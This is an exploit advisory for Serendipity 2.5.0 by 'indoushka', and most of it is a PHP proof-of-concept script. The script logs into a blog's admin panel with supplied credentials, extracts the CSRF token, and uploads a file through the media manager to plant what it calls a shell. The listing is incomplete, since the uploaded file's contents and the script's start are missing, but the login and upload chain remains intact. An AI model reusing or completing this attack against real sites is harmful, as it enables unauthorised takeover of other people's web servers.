============================================================================================================================================= | # Title : Serendipity 2.5.0 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : Windows 10 Fr (Pro) / browser : Mozilla Firefox 136.0.0 (64 bits) | | # Vendor : https://www.s9y.org/latest | ============================================================================================================================================= POC : [+] Dorking in Google or another search engine. [+] Code Description: Serendipity 2.5.0 - Remote Command Execution exploit in PHP (Related: https://packetstorm.news/files/id/178890/ ; no related CVE number is listed). This is a post-authentication issue: the script logs in with a valid Serendipity account, reads the CSRF token (serendipity[token]) from the admin page, and uploads a file through the admin media manager (serendipity[adminModule]=media, serendipity[adminAction]=add), so working credentials for the target are a prerequisite. [+] Save the code as poc.php. [+] Usage: php poc.php <base_url> <username> <password> [+] Note: the listing as reproduced here is incomplete - the start of the script (the opening tag, generate_filename(), get_csrf_token() and the beginning of login()) and the body of the uploaded file did not survive extraction, so it will not run as shown. [+] Payload :
"admin", "serendipity[user]" => $username, "serendipity[pass]" => $password, "submit" => "Login", "serendipity[token]" => $token ]; $headers = [ "Content-Type: application/x-www-form-urlencoded", "Referer: " . $base_url . "/serendipity_admin.php" ]; curl_setopt($session, CURLOPT_URL, $base_url . "/serendipity_admin.php"); curl_setopt($session, CURLOPT_POST, true); curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($data)); curl_setopt($session, CURLOPT_HTTPHEADER, $headers); $response = curl_exec($session); if (strpos($response, "Add media") !== false) { echo "Login Successful!\n"; sleep(2); return $session; } else { echo "Login Failed!\n"; return null; } } function upload_file($session, $base_url, $filename, $token) { echo "Shell Preparing...\n"; sleep(2); $boundary = "---------------------------395233558031804950903737832368"; $headers = [ "Content-Type: multipart/form-data; boundary=" . $boundary, "Referer: " . $base_url . "/serendipity_admin.php?serendipity[adminModule]=media" ]; $payload = "--$boundary\r\n" . "Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n" . "$token\r\n" . "--$boundary\r\n" . "Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n" . 
"admin\r\n" . "--$boundary\r\n" . "Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n" . "media\r\n" . "--$boundary\r\n" . "Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n" . "add\r\n" . "--$boundary\r\n" . "Content-Disposition: form-data; name=\"serendipity[userfile][1]\"; filename=\"$filename\"\r\n" . "Content-Type: text/html\r\n\r\n" . "\n\n
\">\n" . "\n\n" . "
\n
\n\n
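\n\n\r\n" . "--$boundary--\r\n"; curl_setopt($session, CURLOPT_URL, $base_url . "/serendipity_admin.php?serendipity[adminModule]=media"); curl_setopt($session, CURLOPT_POST, true); curl_setopt($session, CURLOPT_HTTPHEADER, $headers); curl_setopt($session, CURLOPT_POSTFIELDS, $payload); $response = curl_exec($session); if (strpos($response, "File $filename successfully uploaded as") !== false) { echo "Your shell is ready: " . $base_url . "/uploads/$filename\n"; } else { echo "Exploit Failed!\n"; } }

/**
 * PoC driver: log in, scrape the CSRF token from the admin page, then upload
 * the generated file through the media manager.
 *
 * @param string $base_url Target blog base URL. A trailing "/" is stripped so
 *                         the paths appended by login()/upload_file() do not
 *                         become "//serendipity_admin.php".
 * @param string $username Serendipity account used for the login POST.
 * @param string $password Password for that account.
 * @return void
 */
function main($base_url, $username, $password) {
    $base_url = rtrim((string) $base_url, '/');
    $filename = generate_filename();
    $session = login($base_url, $username, $password);
    if (!$session) {
        // login() has already printed "Login Failed!"; there is no session to upload into.
        return;
    }
    // Calling curl_exec() again on the handle returned by login() replays its
    // last request (the login POST - curl options persist on the handle). The
    // response is expected to be the admin page that get_csrf_token() parses
    // for serendipity[token]; get_csrf_token() itself is not shown here.
    $adminPage = curl_exec($session);
    $token = $adminPage === false ? null : get_csrf_token($adminPage);
    // Assumes get_csrf_token() yields null/false/'' when no token is present -
    // confirm against its definition. Without a token the media upload is
    // rejected and upload_file() would only print a generic "Exploit Failed!".
    if (!$token) {
        echo "Could not extract the CSRF token from the admin page!\n";
        return;
    }
    upload_file($session, $base_url, $filename, $token);
}

// Entry point. Credentials are taken from argv, so they are visible in the
// process list and shell history of the attacking host.
if ($argc !== 4) {
    echo "Usage: php {$argv[0]} <base_url> <username> <password>\n";
    exit(1);
}
main($argv[1], $argv[2], $argv[3]);
?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================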